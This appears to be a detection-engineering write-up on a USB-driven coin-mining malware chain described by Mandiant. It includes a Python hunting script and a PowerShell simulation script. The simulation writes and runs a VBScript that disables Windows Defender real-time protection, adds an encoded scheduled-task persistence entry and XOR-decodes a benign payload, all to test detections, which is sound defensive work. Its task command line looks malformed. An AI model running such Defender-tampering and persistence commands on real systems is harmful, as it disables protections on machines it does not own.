DIRTYBULK and Friends: USB Malware Fuelling Coinmining Ops
Summary
The report details a USB-driven infection campaign that leverages malicious shortcut files to deliver a multi-stage malware chain for cryptocurrency mining. Initial execution side-loads a DLL named printui.dll from a fake System32 directory, then hands off to a dropper (CUTFAIL), further deploying a downloader (HIGHREPS) and a backdoor (PUMPBENCH). The PUMPBENCH backdoor communicates with a PostgreSQL server to fetch additional payloads and ultimately launches XMRig miners. The operation maintains persistence through Windows Defender exclusions, scheduled tasks, and rogue services.
Analysis
Mandiant researchers deconstructed the kill chain and highlighted four core malware families: DIRTYBULK, CUTFAIL, HIGHREPS, and PUMPBENCH. They captured the actors’ file naming patterns, the DLL side-loading abuse of printui.dll, registry changes, and associated network indicators. The analysis also charted persistence techniques, including scheduled tasks and services linked to the DCOMLaunch Service Group.
Mitigation
Recommended defenses include blocking execution of shortcut files originating from removable media, monitoring for commands that add Windows Defender exclusions, detecting suspicious printui.dll side-loading activity, and hunting for services or scheduled tasks that use random six-digit names. Applying network controls against known malicious domains and DoH resolvers can further limit command-and-control channels.
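A small hunting pass over constructed process-creation and image-load events, added here as an example (it is not the report's or the vendor's own detection content) that implements the checks listed above: Defender exclusion and real-time-protection tampering on the command line, printui.dll loaded from outside the real system directories, six-digit scheduled-task and service names, and script hosts reading from removable media. The event fields, the removable-drive set, and the rule names are assumptions.

```python
import ntpath
import re

# Constructed sample telemetry (not from the report): one process-creation or
# image-load event per dict; "module" is present only on image-load events.
SAMPLE_EVENTS = [
    {"proc": r"C:\Windows\System32\wscript.exe", "cmdline": r'wscript.exe "E:\System32\run.vbs"'},
    {"proc": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -Command "Add-MpPreference -ExclusionPath C:\Users\Public"'},
    {"proc": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /Create /SC ONLOGON /TN 482913 /TR C:\Users\Public\a.exe"},
    {"proc": r"C:\Windows\System32\sc.exe", "cmdline": r"sc create 173204 binPath= C:\Users\Public\s.exe"},
    {"proc": r"C:\Users\Public\System32\printui.exe", "cmdline": r"C:\Users\Public\System32\printui.exe",
     "module": r"C:\Users\Public\System32\printui.dll"},
    {"proc": r"C:\Windows\System32\printui.exe", "cmdline": r"C:\Windows\System32\printui.exe",
     "module": r"C:\Windows\System32\printui.dll"},
    {"proc": r"C:\Windows\System32\notepad.exe", "cmdline": r"notepad.exe C:\Users\bob\n.txt"},
]

REMOVABLE_DRIVES = {"E:", "F:"}  # assumption: drive letters this host maps to USB media
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe"}
DEFENDER_TAMPER = re.compile(r"(Add|Set)-MpPreference\b.*-(Exclusion\w*|DisableRealtimeMonitoring)", re.I)
SIX_DIGIT_TASK = re.compile(r'schtasks\b.*/Create\b.*/TN\s+"?(\d{6})"?(\s|$)', re.I)
SIX_DIGIT_SVC = re.compile(r'\bsc(\.exe)?\s+create\s+"?(\d{6})"?(\s|$)', re.I)
DRIVE_PATH = re.compile(r"\b([A-Z]:)\\", re.I)

def classify(event):
    """Return the names of the hunting rules that fire for one event."""
    hits, cmd = [], event.get("cmdline", "")
    proc, module = ntpath.basename(event["proc"]).lower(), event.get("module")
    if DEFENDER_TAMPER.search(cmd):
        hits.append("defender_exclusion_or_rtp_tamper")
    if SIX_DIGIT_TASK.search(cmd) or SIX_DIGIT_SVC.search(cmd):
        hits.append("six_digit_task_or_service_name")
    # printui.dll is expected only from the real system directories; anywhere else is side-loading
    if module and ntpath.basename(module).lower() == "printui.dll" \
            and ntpath.dirname(module).lower() not in SYSTEM_DIRS:
        hits.append("printui_dll_sideload")
    # a script host whose command line references a path on removable media (USB-borne script)
    if proc in SCRIPT_HOSTS and any(m.group(1).upper() in REMOVABLE_DRIVES for m in DRIVE_PATH.finditer(cmd)):
        hits.append("script_host_from_removable_media")
    return hits

def hunt(events):
    """Map each flagged event's command line to the rules that fired, dropping clean events."""
    flagged = ((e["cmdline"], classify(e)) for e in events)
    return {cmd: names for cmd, names in flagged if names}
```

Calling hunt(SAMPLE_EVENTS) flags five of the seven constructed events; the legitimate printui.dll load and the notepad launch produce no hits.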
Response
Once detected, isolate the impacted host, remove the malicious DLL and related components, delete the malicious scheduled task and service entries, and restore Windows Defender settings by clearing the added exclusions. Perform comprehensive forensic scanning to uncover residual payloads and trace connections to the identified PostgreSQL C2 infrastructure. Finally, update detection content to cover the observed command-line usage and file creation behaviors.
Attack Flow
Detections
Abnormal Space Count in Process Name / Command Line / File Path (via cmdline)
LOLBAS WScript / CScript (via process_creation)
Suspicious Defender Exclusions Modification (via cmdline)
Possible Copy and Rename System Executable for Evasion (via cmdline)
Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands:
- Stage 1 – Drop the malicious VBScript on the compromised USB drive (e.g., E:\payload.vbs). The script disables Windows Defender real-time protection using Set-MpPreference, encodes a payload with an XOR routine, and creates a scheduled task for persistence.
- Stage 2 – Execute the script via wscript.exe, passing the persistence command line directly (to satisfy the rule's conjunctive condition).
- Stage 3 – The script internally invokes PowerShell to run the encoded payload, demonstrating the "infection chain".
- Stage 4 – After execution, the attacker cleans up artifacts (removes the script, deletes the scheduled task).
Regression Test Script:
# ------------------------------------------------------------
# Regression Test – Malware Infection Chain Simulation
# ------------------------------------------------------------
$scriptPath = "$env:TEMP\payload.vbs"
$taskName   = "WinUpdateTask"
$xorKey     = 0x5A

# -- 1. Create XOR-encoded dummy payload ----------------------------------
#    One 16-bit code unit per character, written as 4 hex digits, so that the
#    decoder in the VBScript below (Mid ... 4 / ChrW) reverses it exactly.
$plainPayload = "calc.exe"
$encrypted = ($plainPayload.ToCharArray() |
    ForEach-Object { '{0:X4}' -f ([int]$_ -bxor $xorKey) }) -join ''

# -- 2. Write malicious VBScript -------------------------------------------
@"
' Malicious VBScript – infection chain
Set sh = CreateObject("WScript.Shell")
' Disable real-time protection (Set-MpPreference owns this switch; Add-MpPreference does not)
sh.Run "powershell -Command `"Set-MpPreference -DisableRealtimeMonitoring $true`"", 0, True
' Create scheduled task for persistence
sh.Run "schtasks /Create /SC ONLOGON /TN $taskName /TR `"powershell -EncodedCommand $([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('Start-Process `"$env:windir\system32\cmd.exe`" /c echo $encrypted ^| powershell -EncodedCommand')))`"", 0, True
' Decode and execute payload
Dim encData, decData, i, ch
encData = "$encrypted"
decData = ""
For i = 1 To Len(encData) Step 4
    ch = ChrW(CInt("&H" & Mid(encData, i, 4)) Xor $xorKey)
    decData = decData & ch
Next
sh.Run decData, 0, False
"@ | Set-Content -Encoding ASCII $scriptPath

# -- 3. Execute the script via wscript.exe (triggers the rule) -------------
wscript.exe "$scriptPath" /B

# -- 4. (Optional) Wait a few seconds for the task to fire ----------------
Start-Sleep -Seconds 10

# ------------------------------------------------------------
# Cleanup – remove script and scheduled task
# ------------------------------------------------------------
Remove-Item $scriptPath -Force
schtasks /Delete /TN $taskName /F
Cleanup Commands:
# Remove residual scheduled task (if still present)
schtasks /Delete /TN "WinUpdateTask" /F

# Remove any lingering script files
Remove-Item "$env:TEMP\payload.vbs" -ErrorAction SilentlyContinue

# Re-enable real-time protection (Set-MpPreference; Add-MpPreference has no such parameter)
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $false"